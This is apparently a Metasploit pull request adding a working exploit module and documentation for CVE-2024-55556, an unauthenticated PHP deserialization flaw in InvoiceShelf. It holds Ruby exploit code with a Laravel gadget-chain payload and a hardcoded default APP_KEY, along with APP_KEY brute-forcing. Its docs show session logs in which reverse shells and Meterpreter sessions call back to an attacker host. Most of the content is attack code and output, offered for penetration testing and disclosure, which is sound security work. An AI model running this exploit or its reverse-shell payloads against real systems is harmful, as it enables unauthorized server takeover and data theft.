### PR TITLE
InvoiceShelf unauthenticated PHP deserialization vulnerability [CVE-2024-55556]

### DIFF
--- a/documentation/modules/exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.md
+++ b/documentation/modules/exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.md
@@ -1,0 +1,186 @@
+## Vulnerable Application
+InvoiceShelf is an open-source web & mobile app that helps you track expenses, payments, create professional
+invoices & estimates and is based on the PHP framework Laravel.
+InvoiceShelf has a Remote Code Execution vulnerability that allows remote unauthenticated attackers to conduct
+PHP deserialization attacks. This is possible when the `SESSION_DRIVER=cookie` option is set on the default
+InvoiceShelf .env file meaning that any session will be stored as a ciphered value inside a cookie.
+These sessions are made from a specially crafted JSON containing serialized data which is then ciphered using
+Laravel's encrypt() function.
+An attacker in possession of the `APP_KEY` would therefore be able to retrieve the cookie, uncipher it and modify
+the serialized data in order to get arbitrary deserialization on the affected server, allowing them to achieve
+remote command execution. InvoiceShelf version `1.3.0` and lower is vulnerable.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+to sensitive information.
+
+The following release was tested.
+* InvoiceShelf `1.3.0` on Docker
+
+## Installation steps to install InvoiceShelf on Docker
+* Follow the instructions [here](https://docs.invoiceshelf.com/installation.html) for docker or manual install.
+* Please ensure that `SESSION_DRIVER=cookie` is set to cookie.
+* cp `.env.example` to `.env` and note down the `APP_KEY` setting.
+* To make life easy, use the docker-compose.yml below to install a vulnerable InvoiceShell on Docker.
+```
+ #-------------------------------------------
+ # InvoiceShelf MySQL docker-compose variant
+ # Repo : https://github.com/InvoiceShelf/docker
+ #-------------------------------------------
+
+services:
+  invoiceshelf_db:
+    container_name: invoiceshelf_db
+    image: mariadb:10
+    environment:
+      - MYSQL_DATABASE=invoiceshelf
+      - MYSQL_USER=invoiceshelf
+      - MYSQL_PASSWORD=Passw0rd
+      - MARIADB_ALLOW_EMPTY_ROOT_PASSWORD=true
+    expose:
+      - 3306
+    volumes:
+      - mysql:/var/lib/mysql
+    networks:
+      - invoiceshelf
+    restart: unless-stopped
+    healthcheck:
+      test: ["CMD", "mariadb-admin" ,"ping", "-h", "localhost"]
+      timeout: 20s
+      retries: 10
+
+  invoiceshelf:
+    image: invoiceshelf/invoiceshelf:1.3.0
+    container_name: invoiceshelf
+    ports:
+      - 90:80
+    volumes:
+      - ./invoiceshelf_mysql/data:/data
+      - ./invoiceshelf_mysql/conf:/conf
+    networks:
+      - invoiceshelf
+    environment:
+      # PHP timezone e.g. PHP_TZ=America/New_York
+      - PHP_TZ=UTC
+      - TIMEZONE=UTC
+      - APP_NAME=Laravel
+      - APP_ENV=local
+      - APP_DEBUG=true
+      - APP_URL=http://localhost:90
+      - DB_CONNECTION=mysql
+      - DB_HOST=invoiceshelf_db
+      - DB_PORT=3306
+      - DB_DATABASE=invoiceshelf
+      - DB_USERNAME=invoiceshelf
+      - DB_PASSWORD=Passw0rd
+      - DB_PASSWORD_FILE=
+      - CACHE_STORE=file
+      - SESSION_DRIVER=cookie
+      - SESSION_LIFETIME=1440
+      - SESSION_ENCRYPT=false
+      - SESSION_PATH=/
+      - SESSION_DOMAIN=localhost
+      - SANCTUM_STATEFUL_DOMAINS=localhost:90
+      - STARTUP_DELAY=
+      #- MAIL_DRIVER=smtp
+      #- MAIL_HOST=smtp.mailtrap.io
+      #- MAIL_PORT=2525
+      #- MAIL_USERNAME=null
+      #- MAIL_PASSWORD=null
+      #- MAIL_PASSWORD_FILE=<filename>
+      #- MAIL_ENCRYPTION=null
+    restart: unless-stopped
+    depends_on:
+      - invoiceshelf_db
+
+networks:
+  invoiceshelf:
+
+volumes:
+  mysql:
+```
+* Execute `docker-compose up -d`
+* You can access the InvoiceShelf application at http://localhost:90
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/linux/http/invoiceshelf_uauth_rce_cve_2024_55556`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+### APP_KEY
+This option is required if the BRUTE_FORCE option is not used.
+It is the Laravel APP_KEY with a default key: `base64:kgk/4DW1vEVy7aEvet5FPp5un6PIGe/so8H0mvoUtW0=`.
+
+### BRUTEFORCE
+This option is optional and is a text file with a list of APP_KEYs, one per line for a bruteforce attack.
+
+## Scenarios
+### InvoiceShelf 1.3.0 on Docker -  PHP Command target
+Attack scenario: use the default Laravel APP_KEY preset in the option APP_KEY.
+```msf
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set rhosts 192.168.201.21
+rhosts => 192.168.201.21
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.21:90 can be exploited.
+[+] The target appears to be vulnerable. InvoiceShelf 1.3.0
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the cookie.
+[*] Grabbing the cookies.
+[+] APP_KEY is valid: base64:kgk/4DW1vEVy7aEvet5FPp5un6PIGe/so8H0mvoUtW0=
+[+] Unciphered value: f80a79e26a4e80e6829ca82e9323f17dcbf8226b|{"data":"a:3:{s:6:\"_token\";s:40:\"4Fgr0aT0N85gxRmu4PoVqPzHU7XOH23NCrivJO9x\";s:9:\"_previous\";a:1:{s:3:\"url\";s:40:\"http:\/\/192.168.201.21:90\/login?%2Flogin=\";}s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}}","expires":1741454360}
+[*] Generate an encrypted serialized cookie payload with our cracked APP_KEY.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.21
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.21:54194) at 2025-03-07 17:19:21 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www/html/InvoiceShelf/public
+meterpreter > sysinfo
+Computer    : 72fe563832ca
+OS          : Linux 72fe563832ca 6.12.5-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 21 10:25:35 UTC 2025 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+###  InvoiceShelf 1.3.0 on Docker - Unix/Linux Command target
+Attack scenario: use the BRUTEFORCE option with a list of APP_KEYS in a text file.
+```msf
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set target 1
+target => 1
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set BRUTEFORCE /root/laravel-crypto-killer/wordlists/crater.txt
+BRUTEFORCE => /root/laravel-crypto-killer/wordlists/crater.txt
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.21:90 can be exploited.
+[+] The target appears to be vulnerable. InvoiceShelf 1.3.0
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the cookie.
+[*] Grabbing the cookies.
+[*] Starting bruteforce decryption with APP_KEYS listed in /root/laravel-crypto-killer/wordlists/crater.txt.
+[+] APP_KEY is valid: base64:kgk/4DW1vEVy7aEvet5FPp5un6PIGe/so8H0mvoUtW0=
+[+] Unciphered value: ce0776f8682b66a8407e6a3d62622642ec8fc685|{"data":"a:3:{s:6:\"_token\";s:40:\"Q2zYE5unWqTpdLwFwqgKxBVubiDI95ceLObsbXXV\";s:9:\"_previous\";a:1:{s:3:\"url\";s:40:\"http:\/\/192.168.201.21:90\/login?%2Flogin=\";}s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}}","expires":1741454687}
+[*] Generate an encrypted serialized cookie payload with our cracked APP_KEY.
+[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
+[*] Command shell session 3 opened (192.168.201.8:4444 -> 192.168.201.21:54229) at 2025-03-07 17:24:53 +0000
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(invoiceshelf)
+uname -a
+Linux 72fe563832ca 6.12.5-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 21 10:25:35 UTC 2025 x86_64 GNU/Linux
+pwd
+/var/www/html/InvoiceShelf/public
+```
+
+## Limitations
+No limitations.

--- a/documentation/modules/exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.md
+++ b/documentation/modules/exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.md
@@ -20,7 +20,7 @@ The following release was tested.
 * Follow the instructions [here](https://docs.invoiceshelf.com/installation.html) for docker or manual install.
 * Please ensure that `SESSION_DRIVER=cookie` is set to cookie.
 * cp `.env.example` to `.env` and note down the `APP_KEY` setting.
-* To make life easy, use the docker-compose.yml below to install a vulnerable InvoiceShell on Docker.
+* To make life easy, use the `docker-compose.yml` below to install a vulnerable InvoiceShell on Docker.
 ```
  #-------------------------------------------
  # InvoiceShelf MySQL docker-compose variant

--- a/documentation/modules/exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.md
+++ b/documentation/modules/exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.md
@@ -103,7 +103,7 @@ volumes:
 
 ## Verification Steps
 - [ ] Start `msfconsole`
-- [ ] `use exploit/linux/http/linux/http/invoiceshelf_uauth_rce_cve_2024_55556`
+- [ ] `use exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556`
 - [ ] `set rhosts <ip-target>`
 - [ ] `set rport <port>`
 - [ ] `set lhost <attacker-ip>`

--- a/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
+++ b/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
@@ -1,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::LaravelCryptoKiller
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'InvoiceShelf unauthenticated PHP Deserialization Vulnerability',
+        'Description' => %q{
+          InvoiceShelf is an open-source web & mobile app that helps you track expenses, payments, create professional
+          invoices & estimates and is based on the PHP framework Laravel.
+          InvoiceShelf has a Remote Code Execution vulnerability that allows remote unauthenticated attackers to conduct
+          PHP deserialization attacks. This is possible when the `SESSION_DRIVER=cookie` option is set on the default
+          InvoiceShelf .env file meaning that any session will be stored as a ciphered value inside a cookie.
+          These sessions are made from a specially crafted JSON containing serialized data which is then ciphered using
+          Laravel's encrypt() function.
+          An attacker in possession of the `APP_KEY` would therefore be able to retrieve the cookie, uncipher it and modify
+          the serialized data in order to get arbitrary deserialization on the affected server, allowing them to achieve
+          remote command execution. InvoiceShelf version `1.3.0` and lower is vulnerable.
+          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+          potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+          to sensitive information.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Rémi Matasse', # SynActiv Research Team - discovery of the vulnerability
+          'Mickaël Benassouli' # SynActiv Research Team - discovery of the vulnerability
+        ],
+        'References' => [
+          ['CVE', '2024-55556'],
+          ['URL', 'https://attackerkb.com/topics/25C8UQRPhx/cve-2024-55556'],
+          ['URL', 'https://www.synacktiv.com/advisories/crater-invoice-unauthenticated-remote-command-execution-when-appkey-known']
+        ],
+        'DisclosureDate' => '2024-12-13',
+        'Platform' => ['php', 'unix', 'linux'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => ['php'],
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix/Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 90
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The InvoiceShelf endpoint URL.', '/' ]),
+      OptString.new('APP_KEY', [ true, 'Laravel APP_KEY.', 'base64:kgk/4DW1vEVy7aEvet5FPp5un6PIGe/so8H0mvoUtW0=']),
+      OptPath.new('BRUTEFORCE', [false, 'File with a list of APP_KEYs, one per line for a bruteforce attack.', nil])
+    ])
+  end
+
+  def execute_command(laravel_cookie_cipher, laravel_cookie, laravel_session_cookie, _opts = {})
+    laravel_cookie_id = laravel_cookie.split('=')[0]
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'cookie' => "#{laravel_session_cookie}; #{laravel_cookie_id}=#{laravel_cookie_cipher};",
+      'ctype' => 'application/x-www-form-urlencoded'
+    })
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'app', 'version')
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res&.code == 200
+
+    # check if target is running the InvoiceShelf platform
+    # parse json response and get the version
+    res_json = res.get_json_document
+    version_number = res_json['version'] unless res_json.blank?
+    return CheckCode::Safe('No InvoiceShelf platform found.') if version_number.nil?
+
+    if Rex::Version.new(version_number) <= Rex::Version.new('1.3.0')
+      return CheckCode::Appears("InvoiceShelf #{version_number}")
+    end
+
+    checkCode::Safe("InvoiceShelf #{version_number}")
+  end
+
+  def exploit
+    # lets first check if decryption is successful with the APP_KEY by decrypting the XSRF_TOKEN inside the cookie.
+    # option APP_KEY is either a single entry of a file with APP_KEYS using the [file:] identifier
+    cipher_mode = 'AES-256-CBC'
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    fail_with(Failure::Unknown, 'No valid response received from target.') unless res&.code == 200
+
+    print_status('Lets check if the APP_KEY(s) is/are valid by decrypting the cookie.')
+    print_status('Grabbing the cookies.')
+    set_cookie = res.get_cookies
+    fail_with(Failure::NotFound, 'No cookie found.') if set_cookie.nil?
+    laravel_session_cookie = set_cookie.match(/laravel_session=([^;]+)/) # get laravel_session cookie
+    laravel_cookie = set_cookie.match(/\w{40}=([^;]+)/) # search for the 40 alphanumeric cookie identifier
+    fail_with(Failure::NotFound, 'No cookie found. Unable to check APP_KEY.') if laravel_session_cookie.nil? || laravel_cookie.nil?
+
+    if datastore['BRUTEFORCE']
+      key_file = datastore['BRUTEFORCE']
+      print_status("Starting bruteforce decryption with APP_KEYS listed in #{key_file}.")
+      result = laravel_bruteforce_from_file(laravel_cookie[1], key_file, cipher_mode)
+      fail_with(Failure::NotFound, "Bruteforce decryption failed. No valid APP_KEY found in file #{key_file}.") if result.nil?
+      valid_app_key = result['key']
+      unciphered_value = result['value']
+    else
+      result = laravel_decrypt(laravel_cookie[1], datastore['APP_KEY'], cipher_mode)
+      fail_with(Failure::BadConfig, "Decryption with APP_KEY: #{datastore['APP_KEY']} failed.") if result.nil?
+      valid_app_key = datastore['APP_KEY']
+      unciphered_value = result
+    end
+    print_good("APP_KEY is valid: #{valid_app_key}")
+    print_good("Unciphered value: #{unciphered_value}")
+
+    print_status('Generate an encrypted serialized cookie payload with our cracked APP_KEY.')
+    pl = payload.encoded
+    pl = "php -r \"#{payload.encoded.gsub('"', '\"').gsub('$', '\$')}\"" if target['Type'] == :php
+    pl_len = pl.length
+    laravel_payload = %(a:2:{i:7;O:40:"Illuminate\\Broadcasting\\PendingBroadcast":1:{s:9:"\x00*\x00events";O:35:"Illuminate\\Database\\DatabaseManager":2:{s:6:"\x00*\x00app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";a:1:{i:0;s:#{pl_len}:"#{pl}";}}}}s:13:"\x00*\x00extensions";a:1:{s:6:"system";s:12:"array_filter";}}}i:7;i:7;})
+    b64_laravel_payload = Base64.strict_encode64(laravel_payload)
+    hash_value = unciphered_value.split('|')[0]
+    laravel_cookie_cipher = laravel_encrypt_session_cookie(b64_laravel_payload, hash_value, valid_app_key, cipher_mode)
+    fail_with(Failure::BadConfig, 'Laravel cookie encryption failed.') if laravel_cookie_cipher.nil?
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    execute_command(laravel_cookie_cipher, laravel_cookie[0], laravel_session_cookie[0])
+  end
+end

--- a/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
+++ b/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # lets first check if decryption is successful with the APP_KEY by decrypting the XSRF_TOKEN inside the cookie.
+    # lets first check if decryption is successful with the APP_KEY by decrypting the Laravel cookie.
     # option APP_KEY is either a single entry of a file with APP_KEYS using the [file:] identifier
     cipher_mode = 'AES-256-CBC'
     res = send_request_cgi!({

--- a/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
+++ b/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Generate an encrypted serialized cookie payload with our cracked APP_KEY.')
     pl = payload.encoded
-    pl = "php -r \"#{payload.encoded.gsub('"', '\"').gsub('$', '\$')}\"" if target['Type'] == :php
+    pl = "echo -n #{Base64.strict_encode64(payload.encoded)}|(base64 -d||openssl enc -base64 -d)|php" if target['Type'] == :php
     pl_len = pl.length
     laravel_payload = %(a:2:{i:7;O:40:"Illuminate\\Broadcasting\\PendingBroadcast":1:{s:9:"\x00*\x00events";O:35:"Illuminate\\Database\\DatabaseManager":2:{s:6:"\x00*\x00app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";a:1:{i:0;s:#{pl_len}:"#{pl}";}}}}s:13:"\x00*\x00extensions";a:1:{s:6:"system";s:12:"array_filter";}}}i:7;i:7;})
     b64_laravel_payload = Base64.strict_encode64(laravel_payload)

--- a/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
+++ b/modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Appears("InvoiceShelf #{version_number}")
     end
 
-    checkCode::Safe("InvoiceShelf #{version_number}")
+    CheckCode::Safe("InvoiceShelf #{version_number}")
   end
 
   def exploit
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Generate an encrypted serialized cookie payload with our cracked APP_KEY.')
     pl = payload.encoded
-    pl = "echo -n #{Base64.strict_encode64(payload.encoded)}|(base64 -d||openssl enc -base64 -d)|php" if target['Type'] == :php
+    pl = "echo -n '#{Base64.strict_encode64(payload.encoded)}'|(base64 -d||openssl enc -base64 -d)|php" if target['Type'] == :php
     pl_len = pl.length
     laravel_payload = %(a:2:{i:7;O:40:"Illuminate\\Broadcasting\\PendingBroadcast":1:{s:9:"\x00*\x00events";O:35:"Illuminate\\Database\\DatabaseManager":2:{s:6:"\x00*\x00app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";a:1:{i:0;s:#{pl_len}:"#{pl}";}}}}s:13:"\x00*\x00extensions";a:1:{s:6:"system";s:12:"array_filter";}}}i:7;i:7;})
     b64_laravel_payload = Base64.strict_encode64(laravel_payload)


### PR DESCRIPTION
InvoiceShelf is an open-source web & mobile app that helps you track expenses, payments, create professional
invoices & estimates and is based on the PHP framework Laravel.
InvoiceShelf has a Remote Code Execution vulnerability that allows remote unauthenticated attackers to conduct PHP deserialization attacks. This is possible when the `SESSION_DRIVER=cookie` option is set on the default InvoiceShelf `.env` file meaning that any session will be stored as a ciphered value inside a cookie.
These sessions are made from a specially crafted JSON containing serialized data which is then ciphered using Laravel's `encrypt()` function.
An attacker in possession of the `APP_KEY` would therefore be able to retrieve the cookie, uncipher it and modify the serialized data in order to get arbitrary deserialization on the affected server, allowing them to achieve remote command execution. InvoiceShelf version `1.3.0` and lower is vulnerable.
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

The following release was tested.
* InvoiceShelf `1.3.0` on Docker

## Installation steps to install InvoiceShelf on Docker
* Follow the instructions [here](https://docs.invoiceshelf.com/installation.html) for docker or manual install
* Please ensure that `SESSION_DRIVER=cookie` is set to cookie.
* cp `.env.example` to `.env` and note down the `APP_KEY` setting.
* To make life easy, use the `docker-compose.yml` below to install a vulnerable InvoiceShelf on Docker.
```
 #-------------------------------------------
 # InvoiceShelf MySQL docker-compose variant
 # Repo : https://github.com/InvoiceShelf/docker
 #-------------------------------------------

services:
  invoiceshelf_db:
    container_name: invoiceshelf_db
    image: mariadb:10
    environment:
      - MYSQL_DATABASE=invoiceshelf
      - MYSQL_USER=invoiceshelf
      - MYSQL_PASSWORD=Passw0rd
      - MARIADB_ALLOW_EMPTY_ROOT_PASSWORD=true
    expose:
      - 3306
    volumes:
      - mysql:/var/lib/mysql
    networks:
      - invoiceshelf
    restart: unless-stopped
    healthcheck:
      test: ["CMD", "mariadb-admin" ,"ping", "-h", "localhost"]
      timeout: 20s
      retries: 10

  invoiceshelf:
    image: invoiceshelf/invoiceshelf:1.3.0
    container_name: invoiceshelf
    ports:
      - 90:80
    volumes:
      - ./invoiceshelf_mysql/data:/data
      - ./invoiceshelf_mysql/conf:/conf
    networks:
      - invoiceshelf
    environment:
      # PHP timezone e.g. PHP_TZ=America/New_York
      - PHP_TZ=UTC
      - TIMEZONE=UTC
      - APP_NAME=Laravel
      - APP_ENV=local
      - APP_DEBUG=true
      - APP_URL=http://localhost:90
      - DB_CONNECTION=mysql
      - DB_HOST=invoiceshelf_db
      - DB_PORT=3306
      - DB_DATABASE=invoiceshelf
      - DB_USERNAME=invoiceshelf
      - DB_PASSWORD=Passw0rd
      - DB_PASSWORD_FILE=
      -      - CACHE_STORE=file
      - SESSION_DRIVER=cookie
      - SESSION_LIFETIME=1440
      - SESSION_ENCRYPT=false
      - SESSION_PATH=/
      - SESSION_DOMAIN=localhost
      - SANCTUM_STATEFUL_DOMAINS=localhost:90
      - STARTUP_DELAY=
      #- MAIL_DRIVER=smtp
      #- MAIL_HOST=smtp.mailtrap.io
      #- MAIL_PORT=2525
      #- MAIL_USERNAME=null
      #- MAIL_PASSWORD=null
      #- MAIL_PASSWORD_FILE=<filename>
      #- MAIL_ENCRYPTION=null
    restart: unless-stopped
    depends_on:
      - invoiceshelf_db

networks:
  invoiceshelf:

volumes:
  mysql:
```
* Execute `docker-compose up -d`
* You can access the InvoiceShelf application at http://localhost:90
## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/linux/http/invoiceshelf_uauth_rce_cve_2024_55556`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set lhost <attacker-ip>`
- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
- [ ] `exploit`
you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings.
